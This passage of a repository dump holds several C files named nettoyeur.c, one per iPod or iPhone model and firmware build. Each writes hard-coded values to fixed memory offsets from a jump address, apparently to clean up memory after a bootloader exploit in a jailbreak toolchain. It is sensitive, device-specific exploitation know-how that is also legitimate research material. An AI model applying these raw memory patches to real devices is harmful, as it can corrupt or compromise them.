*(unsigned int *)(TARGET_JUMPADDR + 0x2a30c) = 0x4FF2A308; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a314) = 0xFFFFFFFF; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a318) = 0xFFFFFFFF; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a31c) = 0x00; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a330) = 0x4FF2A350; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a340) = 0x4FF2A340; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a344) = 0x4FF2A340; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a348) = 0x4FF2A348; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a34c) = 0x4FF2A348; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a364) = 0x02; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a36c) = 0x00; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a370) = 0x00; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a374) = 0x00; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a378) = 0x00; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a37c) = 0x00; 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a380) = 0x00; 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a384) = 0x00; 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a388) = 0x00; 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a38c) = 0x00; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a390) = 0x00; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a3b4) = 0x00; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a3b8) = 0x00; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x2a3e8) = 0xFFFFFFFF; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ad80) = 0x4000; 46 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ad84) = 0x00; 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ad88) = 0x1000000; 48 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ae40) = 0x00; 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x2ae60) = 0x00; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afc4) = 0x00; 51 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afe0) = 0x00; 52 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afe4) = 0x00; 53 | *(unsigned int *)(TARGET_JUMPADDR + 0x2afec) = 0x00; 54 | *(unsigned int *)(TARGET_JUMPADDR + 0x2affc) = 0x00; 55 | 56 | return 0; 57 | } 58 | -------------------------------------------------------------------------------- /iPod2,1/8C148/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x0B000000 4 | 5 | int 6 | main (void) 7 | { 8 | *(unsigned int *)(TARGET_JUMPADDR + 0x2504c) = 0xFFFFFFFF; 9 | *(unsigned int *)(TARGET_JUMPADDR + 0x25800) = 0x00; 10 | *(unsigned int *)(TARGET_JUMPADDR + 0x25804) = 0x00; 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x2580c) = 0x00; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x25810) = 0x00; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x2581c) = 0x00; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x25820) = 0x00; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x25824) = 0x00; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x25830) = 0x00; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x25834) = 0x00; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x25864) = 0x00; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x25868) = 0x00; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x25884) = 0x00; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x25970) = 0xFF25970; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x25974) = 0xFF25970; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x25978) = 0xFF25978; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x2597c) = 0xFF25978; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d00) = 0x00; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d10) = 0xFFFFFFFF; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d14) = 0xFFFFFFFF; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d28) = 0xFF26D2C; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d40) = 0x02; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d48) = 0x00; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d4c) = 0x00; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d50) = 0x00; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d54) = 0x00; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d58) = 0x00; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d5c) = 0x00; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d60) = 0x00; 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d64) = 0x00; 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d68) = 0x00; 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d6c) = 0x00; 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d90) = 0x00; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x26d94) = 0x00; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x26dc8) = 0xFF26DC8; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x26dcc) = 0xFF26DC8; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x26dd4) = 0xFFFFFFFF; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e10) = 0xFF26E10; 46 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e14) = 0xFF26E10; 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e38) = 0x00; 48 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e3c) = 0x00; 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e40) = 0x00; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e84) = 0x00; 51 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e98) = 0x00; 52 | *(unsigned int *)(TARGET_JUMPADDR + 0x26e9c) = 0x00; 53 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ea0) = 0x00; 54 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ea4) = 0x00; 55 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ea8) = 0x00; 56 | *(unsigned int *)(TARGET_JUMPADDR + 0x26eb4) = 0x00; 57 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ee0) = 0x00; 58 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ee4) = 0x00; 59 | *(unsigned int *)(TARGET_JUMPADDR + 0x26ef4) = 0x00; 60 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f20) = 0x00; 61 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f24) = 0x00; 62 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f2c) = 0x00; 63 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f30) = 0x00; 64 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f34) = 0x00; 65 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f38) = 0x00; 66 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f3c) = 0x00; 67 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f40) = 0x00; 68 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f44) = 0x00; 69 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f48) = 0x00; 70 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f4c) = 0x00; 71 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f50) = 0x00; 72 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f54) = 0x00; 73 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f58) = 0x00; 74 | *(unsigned int *)(TARGET_JUMPADDR + 0x26f5c) = 0x00; 75 | 76 | return 0; 77 | } 78 | -------------------------------------------------------------------------------- /iPhone4,1/9B206/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x84000000 4 | 5 | int 6 | main(void) 7 | { 8 | 9 | unsigned i; 10 | 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x16254) = 0xFB50F7FF; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x376bc) = 0x9FF18C6D; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x39308) = 0xE000000; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x3931c) = 0xE000000; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x39358) = 0xE000001; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x393f8) = 0xFFFFFFFF; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x39400) = 0x00; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x39404) = 0xFFFFFFFF; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x39408) = 0x00; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x39414) = 0x00; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x39418) = 0x01; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x3941c) = 0x9FF3941C; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x39420) = 0x9FF3941C; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x39460) = 0x9FF39460; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x39464) = 0x9FF39460; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x39468) = 0x9FF39468; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x3946c) = 0x9FF39468; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x39544) = 0xFFFFFFFF; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x39548) = 0xFFFFFFFF; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x3954c) = 0x00; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x39560) = 0x9FF39580; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x39570) = 0x9FF39570; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x39574) = 0x9FF39570; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x39578) = 0x9FF39578; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x3957c) = 0x9FF39578; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x39594) = 0x02; 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x3959c) = 0x00; 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x395a0) = 0x00; 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x395a4) = 0x00; 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x395a8) = 0x00; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x395ac) = 0x00; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x395b0) = 0x00; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x395b4) = 0x00; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x395b8) = 0x00; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x395bc) = 0x00; 46 | *(unsigned int *)(TARGET_JUMPADDR + 0x395c0) = 0x00; 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x395e4) = 0x00; 48 | *(unsigned int *)(TARGET_JUMPADDR + 0x395e8) = 0x00; 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x39618) = 0xFFFFFFFF; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x39660) = 0x4000; 51 | *(unsigned int *)(TARGET_JUMPADDR + 0x39664) = 0x00; 52 | *(unsigned int *)(TARGET_JUMPADDR + 0x39668) = 0x1000000; 53 | *(unsigned int *)(TARGET_JUMPADDR + 0x396e8) = 0xFFFFFFFF; 54 | *(unsigned int *)(TARGET_JUMPADDR + 0x39740) = 0x00; 55 | *(unsigned int *)(TARGET_JUMPADDR + 0x39760) = 0x00; 56 | *(unsigned int *)(TARGET_JUMPADDR + 0x397f0) = 0x00; 57 | *(unsigned int *)(TARGET_JUMPADDR + 0x39868) = 0x00; 58 | *(unsigned int *)(TARGET_JUMPADDR + 0x39874) = 0x00; 59 | *(unsigned int *)(TARGET_JUMPADDR + 0x39878) = 0x00; 60 | *(unsigned int *)(TARGET_JUMPADDR + 0x39880) = 0x00; 61 | *(unsigned int *)(TARGET_JUMPADDR + 0x39884) = 0x00; 62 | *(unsigned int *)(TARGET_JUMPADDR + 0x3988c) = 0x00; 63 | *(unsigned int *)(TARGET_JUMPADDR + 0x39890) = 0x00; 64 | *(unsigned int *)(TARGET_JUMPADDR + 0x39898) = 0x00; 65 | *(unsigned int *)(TARGET_JUMPADDR + 0x3989c) = 0x00; 66 | *(unsigned int *)(TARGET_JUMPADDR + 0x398a4) = 0x00; 67 | *(unsigned int *)(TARGET_JUMPADDR + 0x398a8) = 0x00; 68 | *(unsigned int *)(TARGET_JUMPADDR + 0x398b0) = 0x00; 69 | *(unsigned int *)(TARGET_JUMPADDR + 0x398b4) = 0x00; 70 | *(unsigned int *)(TARGET_JUMPADDR + 0x398f8) = 0x00; 71 | *(unsigned int *)(TARGET_JUMPADDR + 0x398fc) = 0x00; 72 | *(unsigned int *)(TARGET_JUMPADDR + 0x39904) = 0x00; 73 | *(unsigned int *)(TARGET_JUMPADDR + 0x39908) = 0x00; 74 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a00) = 0x00; 75 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a04) = 0x00; 76 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a0c) = 0x00; 77 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a10) = 0x00; 78 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a18) = 0x00; 79 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a1c) = 0x00; 80 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a24) = 0x00; 81 | *(unsigned int *)(TARGET_JUMPADDR + 0x39a28) = 0x00; 82 | 83 | return 0; 84 | } 85 | -------------------------------------------------------------------------------- /iPod4,1/8J2/netto/nettoyeur.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define TARGET_JUMPADDR 0x44000000 4 | 5 | int 6 | main (void) 7 | { 8 | *(unsigned int *)(TARGET_JUMPADDR + 0x34144) = 0x00; 9 | *(unsigned int *)(TARGET_JUMPADDR + 0x3416c) = 0x01; 10 | *(unsigned int *)(TARGET_JUMPADDR + 0x3417c) = 0x00; 11 | *(unsigned int *)(TARGET_JUMPADDR + 0x34188) = 0x00; 12 | *(unsigned int *)(TARGET_JUMPADDR + 0x3418c) = 0x00; 13 | *(unsigned int *)(TARGET_JUMPADDR + 0x34190) = 0x00; 14 | *(unsigned int *)(TARGET_JUMPADDR + 0x34264) = 0xFFFFFFFF; 15 | *(unsigned int *)(TARGET_JUMPADDR + 0x3426c) = 0x00; 16 | *(unsigned int *)(TARGET_JUMPADDR + 0x34270) = 0x00; 17 | *(unsigned int *)(TARGET_JUMPADDR + 0x34274) = 0x00; 18 | *(unsigned int *)(TARGET_JUMPADDR + 0x34278) = 0xFFFFFFFF; 19 | *(unsigned int *)(TARGET_JUMPADDR + 0x3427c) = 0x00; 20 | *(unsigned int *)(TARGET_JUMPADDR + 0x34288) = 0x00; 21 | *(unsigned int *)(TARGET_JUMPADDR + 0x34790) = 0x5FF34790; 22 | *(unsigned int *)(TARGET_JUMPADDR + 0x34794) = 0x5FF34790; 23 | *(unsigned int *)(TARGET_JUMPADDR + 0x34798) = 0x5FF34798; 24 | *(unsigned int *)(TARGET_JUMPADDR + 0x3479c) = 0x5FF34798; 25 | *(unsigned int *)(TARGET_JUMPADDR + 0x347a0) = 0x00; 26 | *(unsigned int *)(TARGET_JUMPADDR + 0x347a8) = 0xFFFFFFFF; 27 | *(unsigned int *)(TARGET_JUMPADDR + 0x347ac) = 0xFFFFFFFF; 28 | *(unsigned int *)(TARGET_JUMPADDR + 0x347b0) = 0x00; 29 | *(unsigned int *)(TARGET_JUMPADDR + 0x347c0) = 0x5FF347C4; 30 | *(unsigned int *)(TARGET_JUMPADDR + 0x347d8) = 0x02; 31 | *(unsigned int *)(TARGET_JUMPADDR + 0x347e0) = 0x00; 32 | *(unsigned int *)(TARGET_JUMPADDR + 0x347e4) = 0x00; 33 | *(unsigned int *)(TARGET_JUMPADDR + 0x347e8) = 0x00; 34 | *(unsigned int *)(TARGET_JUMPADDR + 0x347ec) = 0x00; 35 | *(unsigned int *)(TARGET_JUMPADDR + 0x347f0) = 0x00; 36 | *(unsigned int *)(TARGET_JUMPADDR + 0x347f4) = 0x00; 37 | *(unsigned int *)(TARGET_JUMPADDR + 0x347f8) = 0x00; 38 | *(unsigned int *)(TARGET_JUMPADDR + 0x347fc) = 0x00; 39 | *(unsigned int *)(TARGET_JUMPADDR + 0x34800) = 0x00; 40 | *(unsigned int *)(TARGET_JUMPADDR + 0x34804) = 0x00; 41 | *(unsigned int *)(TARGET_JUMPADDR + 0x34828) = 0x00; 42 | *(unsigned int *)(TARGET_JUMPADDR + 0x3482c) = 0x00; 43 | *(unsigned int *)(TARGET_JUMPADDR + 0x34858) = 0x5FF34858; 44 | *(unsigned int *)(TARGET_JUMPADDR + 0x3485c) = 0x5FF34858; 45 | *(unsigned int *)(TARGET_JUMPADDR + 0x34860) = 0x5FF34860; 46 | *(unsigned int *)(TARGET_JUMPADDR + 0x34864) = 0x5FF34860; 47 | *(unsigned int *)(TARGET_JUMPADDR + 0x3486c) = 0xFFFFFFFF; 48 | *(unsigned int *)(TARGET_JUMPADDR + 0x34870) = 0x01; 49 | *(unsigned int *)(TARGET_JUMPADDR + 0x34880) = 0x00; 50 | *(unsigned int *)(TARGET_JUMPADDR + 0x34884) = 0x00; 51 | *(unsigned int *)(TARGET_JUMPADDR + 0x34888) = 0x60A0100; 52 | *(unsigned int *)(TARGET_JUMPADDR + 0x3489c) = 0x5FF3489C; 53 | *(unsigned int *)(TARGET_JUMPADDR + 0x348a0) = 0x5FF3489C; 54 | *(unsigned int *)(TARGET_JUMPADDR + 0x34940) = 0x00; 55 | *(unsigned int *)(TARGET_JUMPADDR + 0x34944) = 0x00; 56 | *(unsigned int *)(TARGET_JUMPADDR + 0x34948) = 0x00; 57 | *(unsigned int *)(TARGET_JUMPADDR + 0x34988) = 0x00; 58 | *(unsigned int *)(TARGET_JUMPADDR + 0x349c0) = 0x00; 59 | *(unsigned int *)(TARGET_JUMPADDR + 0x34af4) = 0x00; 60 | *(unsigned int *)(TARGET_JUMPADDR + 0x34af8) = 0x00; 61 | *(unsigned int *)(TARGET_JUMPADDR + 0x34afc) = 0x00; 62 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b04) = 0x00; 63 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b08) = 0x00; 64 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b10) = 0x00; 65 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b20) = 0x00; 66 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b24) = 0x00; 67 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b28) = 0x00; 68 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b2c) = 0x00; 69 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b34) = 0x00; 70 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b38) = 0x00; 71 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b40) = 0x00; 72 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b44) = 0x00; 73 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b48) = 0x00; 74 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b50) = 0x00; 75 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b54) = 0x00; 76 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b5c) = 0x00; 77 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b6c) = 0x00; 78 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b70) = 0x00; 79 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b74) = 0x00; 80 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b78) = 0x00; 81 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b8c) = 0x00; 82 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b90) = 0x00; 83 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b94) = 0x00; 84 | *(unsigned int *)(TARGET_JUMPADDR + 0x34b9c) = 0x00; 85 | *(unsigned int *)(TARGET_JUMPADDR + 0x34ba0) = 0x00; 86 | *(unsigned int *)(TARGET_JUMPADDR + 0x34ba8) = 0x00; 87 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bb8) = 0x00; 88 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bbc) = 0x00; 89 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bc0) = 0x00; 90 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bc4) = 0x00; 91 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bcc) = 0x00; 92 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bd0) = 0x00; 93 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bd8) = 0x00; 94 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bdc) = 0x00; 95 | *(unsigned int *)(TARGET_JUMPADDR + 0x34be0) = 0x00; 96 | *(unsigned int *)(TARGET_JUMPADDR + 0x34be8) = 0x00; 97 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bec) = 0x00; 98 | *(unsigned int *)(TARGET_JUMPADDR + 0x34bf4) = 0x00; 99 | *(unsigned int *)(TARGET_JUMPADDR + 0x34c04) = 0x00; 100 | *(unsigned int *)(TARGET_JUMPADDR + 0x34c08) = 0x00; 101 | *(unsigned int *)(TARGET_JUMPADDR + 0x34c0c) = 0x00; 102 | *(unsigned int *)(TARGET_JUMPADDR + 0x34c10) = 0x00; 103 | 104 | return 0; 105 | } 106 | --------------------------------------------------------------------------------